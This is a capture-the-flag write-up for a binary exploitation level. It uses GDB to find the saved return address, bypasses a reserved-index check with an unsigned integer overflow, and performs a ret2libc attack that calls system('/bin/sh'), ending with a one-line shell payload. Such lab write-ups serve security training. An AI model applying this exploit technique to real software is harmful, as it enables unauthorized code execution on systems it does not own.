# Level 07

## Observations

1. The program allows us to write data in a buffer called `data[]`.
2. The index at which we write data is not checked.
3. Indexes that are multiples of `3` are reserved.
4. Given data is written at position `data[index * 4]`

## Plan

We'll take advantage that there is no index checking to create a Buffer Overflow in order overwrite EIP and induce a `Ret2Libc` exploit.

First we need to locate the address of EIP in the stack.  
Unlike the previous levels we cannot write stuff in the entire buffer and above until we overwrite EIP ; we'll have to be a little bit smarter than that.

Fist, locate EIP in the main stack frame with GDB

```txt
(gdb) b *main
(gdb) r
(gdb) info frame
    [...]
    Saved registers:
        eip at 0xffffd70c
```
Okay, we know that EIP is located at **0xFFFFD70C**.  
But how far is it compared to our data buffer ?

```txt
(gdb) b *store_number + 6
(gdb) r
    // Trigger the `store` action
    // [...]

(gdb) p $ebp + 0x8
    $1 = (void *) 0xffffd520 # Address of pointer to buffer

(gdb) x/a 0xffffd520
0xffffd520: 0xffffd544 # Address of buffer
```
The buffer starts at address **0xFFFFD544**.  

Which means that EIP is located exactly `(0xFFFFD70C - 0xFFFFD544)` = **456 bytes** after the start of the data buffer.  
Since each value is written at position `data[index * 4]`, we will be able to overwrite EIP by writing data at index `(456 / 4)` = **114**.

*However*, index 114 is reserved and we cannot write data there *but* we can bypass the reserved index check with an `UINT32 Overflow`.  
Basically, we'll give the program the index `((UINT32_MAX / 4) + 114)` = **1073741938** which is *not* reserved.  
After that, data will be written at `data[index * 4]` and an overflow will occur : `(unsigned int)(1073741938 * 4)` equals to **114**.

Let's give it a try.

```txt
(gdb) run
    // [...]
    Input command: store
    Number: 1633771873 # Decimal representation of 0x61616161 ("aaaa")
    Index: 1073741938
    Completed store command successfully
    
    Input command: quit

Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? () # And there it is
```
*Bingo !* The value we gave to the program overwrites EIP.

Next up, we need to find the addresses of *Libc*'s `system()` function and of a `"/bin/sh"` string.

```txt
(gdb) b *main

(gdb) run

(gdb) print system
    $1 = {<text variable, no debug info>} 0xf7e6aed0 <system>

(gdb) find &system,+99999999,"/bin/sh"
    0xf7f897ec
```
The `system()` function's address is **0xF7E6AED0** and the string's address is **0xF7F897EC**.

We have all we need, let's go for it.

```txt
Input command: store
 Number: 4159090384 # Decimal representation of system() address
 Index: 1073741938
 Completed store command successfully

Input command: store
 Number: 4294967295 # Arbitrary value (0xFFFFFFFF)
 Index: 1073741939 # Can be either that or 115
 Completed store command successfully

Input command: store
 Number: 4160264172 # Decimal representation of string's address
 Index: 1073741940 # Can be either that or 116
 Completed store command successfully

Input command: quit
```


## Payload
```bash
(python -c 'print "store\n4159090384\n1073741938\nstore\n4294967295\n115\nstore\n4160264172\n116\nquit"' ; cat -) | ./level07
```